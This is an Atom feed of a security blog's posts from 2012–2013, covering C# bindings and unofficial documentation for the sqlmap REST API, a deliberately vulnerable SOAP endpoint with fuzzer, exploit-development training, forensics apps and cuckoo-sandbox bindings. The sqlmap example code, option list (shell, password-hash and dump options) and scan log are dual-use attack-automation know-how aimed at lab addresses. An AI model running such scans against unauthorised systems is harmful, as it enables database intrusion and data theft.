<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;A0cDQ3o7fyp7ImA9WhBaEko.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130</id><updated>2013-05-22T21:17:52.407-06:00</updated><category term="ruby" /><category term="opendiagnostics" /><category term="active directory" /><category term="live cd" /><category term="iamnotsecond.org" /><category term="gentoo" /><category term="registry" /><category term="epiphany" /><category term="reverse engineering" /><category term="pidgin" /><category term="google trends" /><category term="wine" /><category term="neat" /><category term="openvas" /><category term="GNOME" /><category term="sqlmap" /><category term="firefox" /><category term="nexpose" /><category term="mosa" /><category term="activism" /><category term="mod_rewrite_drupal" /><category term="gimp" /><category term="windows" /><category term=".net" /><category term="irc" /><category term="physics" /><category term="greasemonkey" /><category term="pisg" /><category term="apache" /><category term="linux" /><category term="facebook" /><category term="opendiagnostic" /><category term="quakecon" /><category term="derbycon" /><category term="meme" /><category term="math" /><category term="volatileminds.net" /><category term="gnump3d" /><category term="dfw" /><category term="vm.n" /><category term="vmware" /><category term="ubuntu-only" /><category term="security" /><category term="loco" /><category term="politics" /><category term="rvm" /><category 
term="metasploit" /><category term="bash" /><category term="ctf" /><category term="forensics" /><category term="tip" /><category term="intrepid" /><category term="life" /><category term="C#" /><category term="wapiti" /><category term="winbind" /><category term="cve" /><category term="audible.com" /><category term="IE" /><category term="clamav" /><category term="workstation" /><category term="mono" /><category term="ubuntu" /><category term="automation" /><category term="nhibernate" /><title>Volatile Minds</title><subtitle type="html">Various thoughts and projects that grab my attention for more than a few minutes.</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://volatile-minds.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>317</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/VolatileMinds" /><feedburner:info uri="volatileminds" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry 
gd:etag="W/&quot;A0cDQ3o5fCp7ImA9WhBaEko.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-8397601178780528228</id><published>2013-05-22T21:16:00.000-06:00</published><updated>2013-05-22T21:17:52.424-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-05-22T21:17:52.424-06:00</app:edited><title>Vulnerable SOAP endpoint and related fuzzer on github</title><content type="html">I have written a small SOAP endpoint in C# and a corresponding fuzzer that parses the WSDL of the vulnerable endpoint and attempts to find SQL injections. It then passes the vulnerable URLs it finds to SQLMap via the RESTful SQLMap API. You can get the source here:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://github.com/brandonprry/vulnerable_soap_service"&gt;https://github.com/brandonprry/vulnerable_soap_service&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/fUSam82LMVs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/8397601178780528228/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2013/05/vulnerable-soap-endpoint-and-related.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/8397601178780528228?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/8397601178780528228?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/fUSam82LMVs/vulnerable-soap-endpoint-and-related.html" title="Vulnerable SOAP endpoint and related fuzzer on github" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2013/05/vulnerable-soap-endpoint-and-related.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0QGQn08fSp7ImA9WhBWGEU.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-7930450908763315835</id><published>2013-04-13T15:42:00.000-06:00</published><updated>2013-04-13T15:42:03.375-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-13T15:42:03.375-06:00</app:edited><title>Interacting with SQLMap from C#</title><content type="html">I just checked in some basic bindings to the SQLMap 
RESTful API. They are pretty simple; below is an example application. It creates a new task, sets the msfPath option (but stores a copy of the options from before), starts the task using a specific URL set in the options dictionary, watches the scan until it completes, then writes the log messages to stdout. You can get the bindings &lt;a href="https://github.com/brandonprry/sqlmap-sharp/"&gt;on github&lt;/a&gt;.
&lt;br /&gt;
&lt;pre&gt;
using System;
using sqlmapsharp;
using System.Collections.Generic;

namespace Example
{
 class MainClass
 {
  public static void Main (string[] args)
  {
   // Connect to the sqlmap REST API server (default port 8775)
   using (SqlmapSession session = new SqlmapSession("127.0.0.1", 8775))
   {
    using (SqlmapManager manager = new SqlmapManager(session))
    {
     // GET /task/new - returns the id of a fresh task
     string taskid = manager.NewTask();

     Console.WriteLine(taskid);

     // Keep a copy of the task's default options before changing anything
     Dictionary&lt;string, object&gt; options = manager.GetOptions(taskid);

     // POST /option/{taskid}/set
     manager.SetOption(taskid, "msfPath", "/path/to/msf");

     // GET /option/{taskid}/list again to confirm the change took effect
     Dictionary&lt;string, object&gt; newoptions = manager.GetOptions(taskid);

     Console.WriteLine("Old msfpath: " + options["msfPath"].ToString());
     Console.WriteLine("New msfpath: " + newoptions["msfPath"].ToString());

     // The target URL is passed in the options dictionary when the scan starts
     options["url"] = "http://192.168.1.254/xslt?PAGE=C_0_0";

     // POST /scan/{taskid}/start
     manager.StartTask(taskid, options);

     SqlmapStatus status = manager.GetScanStatus(taskid);

     // Poll /scan/{taskid}/status every 10 seconds until the scan is finished
     while (status.Status != "terminated")
     {
      System.Threading.Thread.Sleep(new TimeSpan(0,0,10));
      status = manager.GetScanStatus(taskid);
     }

     // GET /scan/{taskid}/log - the messages sqlmap produced during the run
     List&lt;SqlmapLogItem&gt; logItems = manager.GetLog(taskid);

     foreach (SqlmapLogItem item in logItems)
      Console.WriteLine(item.Message);

     // GET /task/{taskid}/delete - clean up the task on the server
     manager.DeleteTask(taskid);
    }
   }
  }
 }
}

&lt;/pre&gt;&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/SbPIwyoRiDw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/7930450908763315835/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2013/04/interacting-with-sqlmap-from-c.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/7930450908763315835?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/7930450908763315835?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/SbPIwyoRiDw/interacting-with-sqlmap-from-c.html" title="Interacting with SQLMap from C#" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2013/04/interacting-with-sqlmap-from-c.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0YARXozfCp7ImA9WhBWGEU.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-359869866230857838</id><published>2013-04-13T13:25:00.001-06:00</published><updated>2013-04-13T13:25:44.484-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-13T13:25:44.484-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sqlmap" /><title>Unofficial SQLmap RESTful API documentation</title><content type="html">This isn't comprehensive, just the most useful methods. I haven't found any docs on the API yet but wanted to play with it. :)
&lt;br /&gt;&lt;br /&gt;
The full list of available methods is:
&lt;pre&gt;
@get("/task/new")
@get("/task/&amp;lt;taskid&amp;gt;/delete")
@get("/admin/&amp;lt;taskid&amp;gt;/list")
@get("/admin/&amp;lt;taskid&amp;gt;/flush")
@get("/option/&amp;lt;taskid&amp;gt;/list")
@post("/option/&amp;lt;taskid&amp;gt;/get")
@post("/option/&amp;lt;taskid&amp;gt;/set")
@post("/scan/&amp;lt;taskid&amp;gt;/start")
@get("/scan/&amp;lt;taskid&amp;gt;/stop")
@get("/scan/&amp;lt;taskid&amp;gt;/kill")
@get("/scan/&amp;lt;taskid&amp;gt;/status")
@get("/scan/&amp;lt;taskid&amp;gt;/data")
@get("/scan/&amp;lt;taskid&amp;gt;/log/&amp;lt;start&amp;gt;/&amp;lt;end&amp;gt;")
@get("/scan/&amp;lt;taskid&amp;gt;/log")
@get("/download/&amp;lt;taskid&amp;gt;/&amp;lt;target&amp;gt;/&amp;lt;filename:path&amp;gt;")
&lt;/pre&gt;
&lt;br /&gt;&lt;br /&gt;
These are the methods I have been using:
&lt;br /&gt;
GET /task/new
&lt;br /&gt;
Response:
&lt;pre&gt;
{
    "taskid": "1d47d7f046df1504"
}
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
GET /task/&amp;lt;task_id&amp;gt;/delete
&lt;br /&gt;
Response:
&lt;pre&gt;
{
    "success": true
}
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
GET /option/&amp;lt;task_id&amp;gt;/list
&lt;br /&gt;
Response:
&lt;pre&gt;
{
    "options": {
        "crawlDepth": null, 
        "osShell": false, 
        "getUsers": false, 
        "getPasswordHashes": false, 
        "excludeSysDbs": false, 
        "uChar": null, 
        "regData": null, 
        "cpuThrottle": 5, 
        "prefix": null, 
        "code": null, 
        "googlePage": 1, 
        "query": null, 
        "randomAgent": false, 
        "delay": 0, 
        "isDba": false, 
        "requestFile": null, 
        "predictOutput": false, 
        "wizard": false, 
        "stopFail": false, 
        "forms": false, 
        "taskid": "73674cc5eace4ac7", 
        "skip": null, 
        "dropSetCookie": false, 
        "smart": false, 
        "risk": 1, 
        "sqlFile": null, 
        "rParam": null, 
        "getCurrentUser": false, 
        "notString": null, 
        "getRoles": false, 
        "getPrivileges": false, 
        "testParameter": null, 
        "tbl": null, 
        "charset": null, 
        "trafficFile": null, 
        "osSmb": false, 
        "level": 1, 
        "secondOrder": null, 
        "pCred": null, 
        "timeout": 30, 
        "firstChar": null, 
        "updateAll": false, 
        "binaryFields": false, 
        "checkTor": false, 
        "aType": null, 
        "direct": null, 
        "saFreq": 0, 
        "tmpPath": null, 
        "titles": false, 
        "getSchema": false, 
        "identifyWaf": false, 
        "checkWaf": false, 
        "regKey": null, 
        "limitStart": null, 
        "loadCookies": null, 
        "dnsName": null, 
        "csvDel": ",", 
        "oDir": null, 
        "osBof": false, 
        "invalidLogical": false, 
        "getCurrentDb": false, 
        "hexConvert": false, 
        "answers": null, 
        "host": null, 
        "dependencies": false, 
        "cookie": null, 
        "proxy": null, 
        "regType": null, 
        "optimize": false, 
        "limitStop": null, 
        "mnemonics": null, 
        "uFrom": null, 
        "noCast": false, 
        "testFilter": null, 
        "eta": false, 
        "threads": 1, 
        "logFile": null, 
        "os": null, 
        "col": null, 
        "rFile": null, 
        "verbose": 1, 
        "aCert": null, 
        "torPort": null, 
        "privEsc": false, 
        "forceDns": false, 
        "getAll": false, 
        "api": true, 
        "url": null, 
        "invalidBignum": false, 
        "regexp": null, 
        "getDbs": false, 
        "freshQueries": false, 
        "uCols": null, 
        "smokeTest": false, 
        "pDel": null, 
        "wFile": null, 
        "udfInject": false, 
        "tor": false, 
        "forceSSL": false, 
        "beep": false, 
        "saveCmdline": false, 
        "configFile": null, 
        "scope": null, 
        "dumpAll": false, 
        "torType": "HTTP", 
        "regVal": null, 
        "dummy": false, 
        "commonTables": false, 
        "search": false, 
        "skipUrlEncode": false, 
        "referer": null, 
        "liveTest": false, 
        "purgeOutput": false, 
        "retries": 3, 
        "extensiveFp": false, 
        "dumpTable": false, 
        "database": "/tmp/sqlmapipc-EmjjlQ", 
        "batch": true, 
        "headers": null, 
        "flushSession": false, 
        "osCmd": null, 
        "suffix": null, 
        "dbmsCred": null, 
        "regDel": false, 
        "shLib": null, 
        "nullConnection": false, 
        "timeSec": 5, 
        "msfPath": null, 
        "noEscape": false, 
        "getHostname": false, 
        "sessionFile": null, 
        "disableColoring": true, 
        "getTables": false, 
        "agent": null, 
        "lastChar": null, 
        "string": null, 
        "dbms": null, 
        "tamper": null, 
        "hpp": false, 
        "runCase": null, 
        "osPwn": false, 
        "evalCode": null, 
        "cleanup": false, 
        "getBanner": false, 
        "profile": false, 
        "regRead": false, 
        "bulkFile": null, 
        "safUrl": null, 
        "db": null, 
        "dumpFormat": "CSV", 
        "alert": null, 
        "user": null, 
        "parseErrors": false, 
        "aCred": null, 
        "getCount": false, 
        "dFile": null, 
        "data": null, 
        "regAdd": false, 
        "ignoreProxy": false, 
        "getColumns": false, 
        "mobile": false, 
        "googleDork": null, 
        "sqlShell": false, 
        "pageRank": false, 
        "tech": "BEUSTQ", 
        "textOnly": false, 
        "commonColumns": false, 
        "keepAlive": false
    }
}
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
POST /option/&amp;lt;task_id&amp;gt;/set -- Content-Type: application/json
&lt;br /&gt;
Request:
&lt;pre&gt;
{ "msfPath" : "/path/to/metasploit/framework" }
&lt;/pre&gt;
Response:
&lt;pre&gt;
{
    "success": true
}
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
POST /scan/&amp;lt;task_id&amp;gt;/start -- Content-Type: application/json
&lt;br /&gt;
Request (optional):
&lt;pre&gt;
{ "url" : "192.168.1.250/index.php?wut=injectable" }
&lt;/pre&gt;
Response:
&lt;pre&gt;
{
    "engineid": 16784, 
    "success": true
}
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
GET /scan/&amp;lt;task_id&amp;gt;/log
&lt;br /&gt;
Response:
&lt;pre&gt;
{
    "log": [
        {
            "message": "testing connection to the target URL", 
            "level": "INFO", 
            "time": "14:11:23"
        }, 
        {
            "message": "testing if the target URL is stable. This can take a couple of seconds", 
            "level": "INFO", 
            "time": "14:11:24"
        }, 
        {
            "message": "target URL is stable", 
            "level": "INFO", 
            "time": "14:11:26"
        }, 
        {
            "message": "no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')", 
            "level": "CRITICAL", 
            "time": "14:11:26"
        }, 
        {
            "message": "testing connection to the target URL", 
            "level": "INFO", 
            "time": "14:17:30"
        }, 
        {
            "message": "testing if the target URL is stable. This can take a couple of seconds", 
            "level": "INFO", 
            "time": "14:17:31"
        }, 
        {
            "message": "target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on", 
            "level": "WARNING", 
            "time": "14:17:33"
        }, 
        {
            "message": "testing if GET parameter 'PAGE' is dynamic", 
            "level": "INFO", 
            "time": "14:17:33"
        }, 
        {
            "message": "confirming that GET parameter 'PAGE' is dynamic", 
            "level": "INFO", 
            "time": "14:17:33"
        }, 
        {
            "message": "GET parameter 'PAGE' does not appear dynamic", 
            "level": "WARNING", 
            "time": "14:17:33"
        }, 
        {
            "message": "reflective value(s) found and filtering out", 
            "level": "WARNING", 
            "time": "14:17:33"
        }, 
        {
            "message": "heuristic (basic) test shows that GET parameter 'PAGE' might not be injectable", 
            "level": "WARNING", 
            "time": "14:17:33"
        }, 
        {
            "message": "testing for SQL injection on GET parameter 'PAGE'", 
            "level": "INFO", 
            "time": "14:17:34"
        }, 
        {
            "message": "testing 'AND boolean-based blind - WHERE or HAVING clause'", 
            "level": "INFO", 
            "time": "14:17:34"
        }, 
        {
            "message": "testing 'MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause'", 
            "level": "INFO", 
            "time": "14:17:34"
        }, 
        {
            "message": "testing 'PostgreSQL AND error-based - WHERE or HAVING clause'", 
            "level": "INFO", 
            "time": "14:17:34"
        }, 
        {
            "message": "testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'", 
            "level": "INFO", 
            "time": "14:17:34"
        }, 
        {
            "message": "testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'MySQL inline queries'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'PostgreSQL inline queries'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'Microsoft SQL Server/Sybase inline queries'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'Oracle inline queries'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'SQLite inline queries'", 
            "level": "INFO", 
            "time": "14:17:35"
        }, 
        {
            "message": "testing 'MySQL &gt; 5.0.11 stacked queries'", 
            "level": "INFO", 
            "time": "14:17:36"
        }, 
        {
            "message": "testing 'PostgreSQL &gt; 8.1 stacked queries'", 
            "level": "INFO", 
            "time": "14:17:36"
        }, 
        {
            "message": "testing 'Microsoft SQL Server/Sybase stacked queries'", 
            "level": "INFO", 
            "time": "14:17:36"
        }, 
        {
            "message": "testing 'MySQL &gt; 5.0.11 AND time-based blind'", 
            "level": "INFO", 
            "time": "14:17:36"
        }, 
        {
            "message": "testing 'PostgreSQL &gt; 8.1 AND time-based blind'", 
            "level": "INFO", 
            "time": "14:17:37"
        }, 
        {
            "message": "testing 'Microsoft SQL Server/Sybase time-based blind'", 
            "level": "INFO", 
            "time": "14:17:37"
        }, 
        {
            "message": "testing 'Oracle AND time-based blind'", 
            "level": "INFO", 
            "time": "14:17:37"
        }, 
        {
            "message": "testing 'MySQL UNION query (NULL) - 1 to 10 columns'", 
            "level": "INFO", 
            "time": "14:17:37"
        }, 
        {
            "message": "testing 'Generic UNION query (NULL) - 1 to 10 columns'", 
            "level": "INFO", 
            "time": "14:17:38"
        }, 
        {
            "message": "using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'", 
            "level": "WARNING", 
            "time": "14:17:38"
        }, 
        {
            "message": "GET parameter 'PAGE' is not injectable", 
            "level": "WARNING", 
            "time": "14:17:39"
        }, 
        {
            "message": "all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')", 
            "level": "CRITICAL", 
            "time": "14:17:40"
        }, 
        {
            "message": "HTTP error codes detected during run:\n404 (Not Found) - 183 times", 
            "level": "WARNING", 
            "time": "14:17:40"
        }
    ]
}
&lt;/pre&gt;
&lt;br /&gt;
GET /scan/&amp;lt;task_id&amp;gt;/status
&lt;br /&gt;
Response:
&lt;pre&gt;
{
    "status": "terminated", 
    "returncode": 0
}
&lt;/pre&gt;&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/brkMCHpW00c" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/359869866230857838/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2013/04/unofficial-sqlmap-restful-api.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/359869866230857838?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/359869866230857838?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/brkMCHpW00c/unofficial-sqlmap-restful-api.html" title="Unofficial SQLmap RESTful API documentation" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2013/04/unofficial-sqlmap-restful-api.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUUNR3w-cCp7ImA9WhBTGUo.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-7005327969544841770</id><published>2013-02-15T18:08:00.000-06:00</published><updated>2013-02-15T18:08:16.258-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-02-15T18:08:16.258-06:00</app:edited><title>Corelan Training</title><content type="html">This week, I took the &lt;a href="https://www.corelan-training.com/" target="_blank"&gt;Corelan Exploit Development Training&lt;/a&gt;. It was a two day training, on Tuesday and Wednesday, and very fun. 
I will admit, it is not for the weak of heart. Tuesday, we started at 9am, and I ended up leaving around 11pm, and other guys stayed even later. Wednesday, we started at 9am again and went until around 8pm.&lt;br /&gt;
&lt;br /&gt;
During the first day, we discussed classic buffer overflows resulting in pointer overwrites and the like, and how to exploit them using Immunity Debugger and mona.py. Luckily, I already had experience with most of the materials for the first day through &lt;a href="http://volatile-minds.blogspot.com/2011/07/breaking-mailenable-234-lesson-in.html" target="_blank"&gt;personal experience&lt;/a&gt;, and was able to help the other guys taking the class with using mona and with how the buffer overflows worked.&lt;br /&gt;
&lt;br /&gt;
During the second day, we discussed DEP, ASLR, and ROP chains. I do not have much experience with these, so the learning curve was higher, although I did understand the fundamentals of how these worked. We also discussed heap sprays, which was great as well. Heap sprays had been on my to-do list for quite a while and are incredibly interesting to me.&lt;br /&gt;
&lt;br /&gt;
Peter is a great teacher and understands the materials well enough to answer tangential questions that aren't really covered in the materials. He understands his students very well, so he is able to relate information in meaningful ways, which is infinitely more helpful than just presenting information and expecting the students to remember it by simple rote memory. It also helps that he presents materials that he wrote himself, rather than simply using someone else's work.&lt;br /&gt;
&lt;br /&gt;
Overall, I highly recommend the class if you have the means. In order to really get the most out of the class, you should absolutely have a basic understanding of assembly and how stacks and heaps work. You can read up on these on the &lt;a href="https://www.corelan.be/index.php/articles/" target="_blank"&gt;corelan website&lt;/a&gt;.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/kxJOH5PVkNg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/7005327969544841770/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2013/02/corelan-training.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/7005327969544841770?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/7005327969544841770?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/kxJOH5PVkNg/corelan-training.html" title="Corelan Training" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2013/02/corelan-training.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0QNR346eSp7ImA9WhNbFEo.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-6350861214074151140</id><published>2013-01-17T19:09:00.001-06:00</published><updated>2013-01-17T19:09:56.011-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-01-17T19:09:56.011-06:00</app:edited><title>First Ubuntu 
apps published</title><content type="html">Check out the VolatileMinds Registry Reader or the VolatileMinds Pagefile Analyzer in the Ubuntu app store.&lt;br /&gt;
&lt;br /&gt;
The registry reader is a GTK/Mono application that allows the user to read offline hives with an easy-to-use UI.&lt;br /&gt;
&lt;br /&gt;
The pagefile analyzer is a GTK/mono application that allows the user to analyze a pagefile.sys from a computer, and search for email addresses, filepaths, environment variables, and more.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/MKYTwkOlXlA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/6350861214074151140/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2013/01/first-ubuntu-apps-published.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/6350861214074151140?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/6350861214074151140?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/MKYTwkOlXlA/first-ubuntu-apps-published.html" title="First Ubuntu apps published" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2013/01/first-ubuntu-apps-published.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0YHQnw-fip7ImA9WhNVGUw.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-211347899634512222</id><published>2012-12-30T18:52:00.001-06:00</published><updated>2012-12-30T18:52:13.256-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-12-30T18:52:13.256-06:00</app:edited><title>Controlling cuckoo-sandbox from C#</title><content type="html">After testing some metasploit modules today, I decided 
writing some bindings for cuckoo-sandbox would be fun. I have been writing a small project that uses my clamav bindings to watch high-risk areas and scan them on the fly. A fun, new addition would be to automagically submit anything found by clamav straight to cuckoo-sandbox and get the report back.&lt;br /&gt;
&lt;br /&gt;
The code is on &lt;a href="https://github.com/brandonprry/cuckoo-sharp" target="_blank"&gt;github&lt;/a&gt;&amp;nbsp;and there is a small example application. Not every method is implemented fully, but it is still fun to play with. I did have to use a third party library for JSON parsing because of a bug in Mono's JavaScriptSerializer.&lt;br /&gt;
&lt;br /&gt;
There is also an example &lt;a href="https://github.com/brandonprry/cuckoo-sharp/blob/master/Example/Main.cs" target="_blank"&gt;program&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/Buj1O-7-2Vk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/211347899634512222/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/12/controlling-cuckoo-sandbox-from-c.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/211347899634512222?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/211347899634512222?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/Buj1O-7-2Vk/controlling-cuckoo-sandbox-from-c.html" title="Controlling cuckoo-sandbox from C#" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/12/controlling-cuckoo-sandbox-from-c.html</feedburner:origLink></entry><entry 